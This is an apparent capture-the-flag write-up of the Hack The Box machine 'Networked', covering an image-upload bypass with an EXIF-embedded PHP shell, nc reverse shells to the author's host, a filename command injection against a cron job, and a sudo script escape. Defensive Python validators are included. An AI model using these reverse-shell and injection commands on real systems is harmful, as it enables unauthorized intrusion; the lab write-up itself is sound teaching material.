I was browsing Hack The Box today, and decided to tackle a new box, the box I saw was Networked, it’s made by Guly and looks like a fairly easy box, so let’s get exploiting!
The machine lives on 10.10.10.146. A quick nmap scan shows ports 22 and 80 are open, so we know the initial foothold will come from the web.
The initial page is just some text, so let's run dirbuster on it! After a quick scan, we see a public /uploads/ directory and a /backup/ directory.
Awesome! We’ve got a backup of the source code, let’s download and inspect the code! The source ships with index.php, lib.php, photos.php and upload.php. Now, I think we’re most interested in the upload part and the photos part. Let’s check it out.
After an initial review, it looks like upload.php just takes a file, renames it after the user's IP address, and saves it to /var/www/html/uploads/; the only checks are on MIME type and file extension. Now, there are two ways we can crack at this: the first is uploading a common PHP shell with a file name like notashell.php%00.jpg, but let's try harder and actually embed the shell in an image comment with exiftool!
I start off by downloading a photo of the CentOS logo, and then run exiftool on it. Here’s how it looks:
We now have an embedded shell inside the photo, let’s upload this picture!
We’re told to refresh the gallery, upon refresh we see the picture! Let’s go to the direct link of it.
Our shell takes its command from ?c=$command, so let's have it open a reverse shell to our local box. Add the argument ?c=nc 10.10.14.128 9983 -e /bin/bash and load the page. It will hang forever, as long as you keep the tty open.
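The upload step works because the server trusts the extension and the client-supplied MIME type and never looks at the bytes it is storing. As an added example (my own code, not the box's upload.php, whose exact checks are not shown here), this Python validator rejects the two tricks mentioned above: a NUL byte or double extension in the name, and a PHP open tag hidden anywhere in the body, such as an EXIF comment. The allowed types and their magic bytes are my own choice for the example.

```python
import re

# Allowed image extensions and the magic bytes a genuine file of that type starts with.
# Constructed for this example; the real upload.php's checks are not shown on the page.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# A PHP open tag anywhere in the body (EXIF comment included) means this is not just a picture.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons an upload should be rejected (empty list means accept)."""
    reasons = []

    # %00 in the URL becomes a raw NUL once decoded; a C-based stack may truncate the name there.
    if "\x00" in filename:
        reasons.append("NUL byte in filename")

    # Exactly one extension: "name.ext". Double extensions like x.php.jpg are refused outright.
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        reasons.append("filename must be name.ext with exactly one extension")

    ext = parts[-1]
    if ext not in MAGIC:
        reasons.append(f"extension .{ext} not allowed")
    elif not data.startswith(MAGIC[ext]):
        # Extension says image, content says otherwise: the client-supplied type is not trusted.
        reasons.append("file content does not match its extension")

    # Magic bytes alone are not enough: metadata fields can carry arbitrary text, so scan the body.
    if PHP_TAG.search(data):
        reasons.append("PHP tag embedded in file body")

    return reasons
```

Storing accepted files under a server-chosen name (as the box does with the client IP) and serving the uploads directory with script execution disabled would close the gap even if a check above were bypassed.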
We got our initial apache/www-data shell! A quick check of /home/ shows a user, guly, with a crontab file and a check_attack.php; this might be interesting.
crontab.guly runs check_attack.php every 3rd minute, and that script looks for files not named like ip.extension, so we can leverage this. It also doesn't bother to escape the shell arguments. Bingo!
So we need to spawn a shell, and we've got nc on the box, so let's force one open. Go into /var/www/html/uploads/ and run: touch "; nc 10.10.$IP $PORT -c bash" to open a shell when the cron job next runs, then wait for the back connection.
Bingo, we have a shell, let’s spawn a proper pty session with python:
python -c 'import pty; pty.spawn("/bin/bash")'
Now we've got our full and proper shell! Let's grab the user flag with cat /home/guly/user.txt!
Perfect, we’ve got the flag! Let’s head for root. After doing a few of these boxes, I’ve found that a good starter spot to check is sudo -l, so let’s run that:
Perfect, I got lucky this time. We have a /usr/local/sbin/changename.sh that accepts a limited range of arbitrary input! We should be able to bypass this!
Now we have two ways to attack this: the first is to copy the /root/ directory into guly's home and chown it so we can read it; the second is to just spawn a bash shell. Let's start by copying the /root/ directory out.
Perfect, our escape worked! Let’s check the /home/guly/ directory!
We got our root flag! But we could have done the same escape with test\ bash as the input, so let's try it.
Hello, root! Yet another way we jumped in to get the root flag.
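The check_attack.php cron job and the changename.sh sudo script fall for the same reason: a string the user controls reaches a shell without quoting or validation, so a filename or a "name" becomes extra commands. The Python below is an added example of my own, not code from the box or from Guly, showing the fix for both cases. Neither script's source is on the page, so the name patterns (EXPECTED_NAME for the ip.extension scheme, SAFE_NAME for what a changename-type script might accept) are assumptions; unsafe_command only returns the string it would have run, it never executes it.

```python
import os
import re
import shlex
import tempfile

# Names the cron job expects in uploads/: <ipv4>.<ext>, e.g. 10.10.14.128.jpg (the page's scheme).
EXPECTED_NAME = re.compile(r"^(\d{1,3}\.){3}\d{1,3}\.(jpg|jpeg|png|gif)$")

# Assumed input rule for a changename-type script: one plain token, no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,62}$")


def is_expected_name(name: str) -> bool:
    """True only for names that fit the ip.extension scheme exactly."""
    return EXPECTED_NAME.fullmatch(name) is not None


def unsafe_command(name: str) -> str:
    """The shape of the bug: the filename is concatenated into a shell command line.
    Returned rather than executed so the injection is visible in the output."""
    return "rm -f " + name


def quoted_command(name: str) -> str:
    """If a shell string really is unavoidable, shlex.quote turns metacharacters into data."""
    return "rm -f " + shlex.quote(name)


def safe_cleanup(directory: str) -> list[str]:
    """Delete files whose names do not fit the scheme, without ever invoking a shell.
    The name is never interpreted; it is only compared and passed to os.remove."""
    removed = []
    for entry in os.scandir(directory):
        if entry.is_file() and not is_expected_name(entry.name):
            os.remove(entry.path)
            removed.append(entry.name)
    return sorted(removed)


def validate_name_for_script(name: str) -> bool:
    """Gate for anything that will land in a bash variable: allowlist, not blocklist.
    'test bash' (the page's test\\ bash trick) fails because of the space."""
    return SAFE_NAME.fullmatch(name) is not None


def demo() -> list[str]:
    """Constructed uploads directory: one good name, one injection-shaped name, one stray file."""
    with tempfile.TemporaryDirectory() as d:
        for n in ("10.10.14.128.jpg", "; id", "notes.txt"):
            open(os.path.join(d, n), "w").close()
        return safe_cleanup(d)


if __name__ == "__main__":
    print(unsafe_command("; id"))   # the shell would see a second command here
    print(quoted_command("; id"))   # the same bytes, now a single literal argument
    print(demo())
```

The cron fix is the important one: the script only has to decide whether a file stays or goes, so there is no reason to hand the filename to a shell at all. For the sudo script, bash quoting ("$name") stops word splitting, but an allowlist on the input is what keeps the script's own logic honest.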
That’s all for this box, we can consider it owned.